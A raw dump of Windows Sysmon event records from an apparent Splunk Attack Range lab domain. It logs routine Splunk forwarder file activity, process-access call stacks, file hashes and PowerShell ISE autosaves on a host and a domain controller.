19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606058Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB4D18D5B6D747CF98FC3998CBF4C46,SHA256=F48EAE814EF2C169914B730A3EF622690CD6851796E62159CC0C5E18C77C8137falsefalse - insufficient disk space 11241100x80000000000000001606057Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606056Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEF094076F5A5DD5F2047CB984FA273B,SHA256=30CA25C8937A887CC7C4B86DAA6FEDF91B5205ECEA0379BB36BCFDC2AEFDD871falsefalse - insufficient disk space 23542300x80000000000000001095057Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.969{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=359531799EF0E813A8E4DCC44DA0C555,SHA256=312F1C980CFE391C4E0DD5BD98AFE9A02116EC9DFE2D8EDB8A342B4493F25AD6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606064Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:07.573{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606063Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:07.573{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471D9595F3F21721EFE5F0E2EC5F9032,SHA256=C277A87BBE2BADD20422E536AE8EB28566BBE073902134AAC3BF3F7510B44A05falsefalse - insufficient disk space 10341000x80000000000000001095056Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095055Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:07.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095054Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.059{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095053Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:07.058{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095052Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.058{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095051Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:07.057{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095050Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.057{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095049Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.057{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095048Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.057{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095047Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.056{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095062Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.973{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF720E0BA433D36C4FBF0979B92C8D3,SHA256=8D1C70659C95CBDAC11536C47535C7FE050BB0B511F56423D7094306B191974C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606070Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.576{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606069Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.576{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3357E2EEB013D544AED1A3852CABDA7,SHA256=FA856B996EB5738623D439BB153CFBF260BC6CC7850611642D4EDE01AF82A61Efalsefalse - insufficient disk space 354300x80000000000000001095061Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:03.763{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1145-false10.0.1.12-8000- 10341000x80000000000000001095060Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095059Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095058Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.276{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82DF35307BB9C91581B3348696A2F2ED,SHA256=6522646607BA2AA4E9093B84FDEFFE48FB97021AA9A62CF2233C91E6E208936D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001606068Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452WIN-HOST-5\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6452.xml~RFb940e57.TMPMD5=FABC111312CD43093B0ECB217784AE61,SHA256=E4C54946B4732E720A02A0F783874B6D71E92ED837209F7EBDA4D14779023557falsefalse - insufficient disk space 11241100x80000000000000001606067Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6452.xml~RFb940e57.TMP2021-04-21 19:18:08.121 254200x80000000000000001606066Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\ecivaw1u.tmp2021-04-20 20:22:02.3742021-04-21 19:18:08.121 11241100x80000000000000001606065Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\ecivaw1u.tmp2021-04-21 19:18:08.121 10341000x80000000000000001095073Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.992{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095072Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.990{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095071Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:09.990{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095070Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.990{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095069Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:09.989{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095068Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.989{761B69BB-818A-607D-0500-00000000BA01}408424C:\Windows\system32\csrss.exe{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095067Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.989{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095066Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.989{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095065Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.984{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A74EE2D1EE3AC639AD9DD5FDE8F8BB13,SHA256=9BDAD3303BEFC88B44C24800D9E957C245B608A0F66FE1AA24460A955431FBFD,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x80000000000000001606072Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:09.578{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606071Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:09.578{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 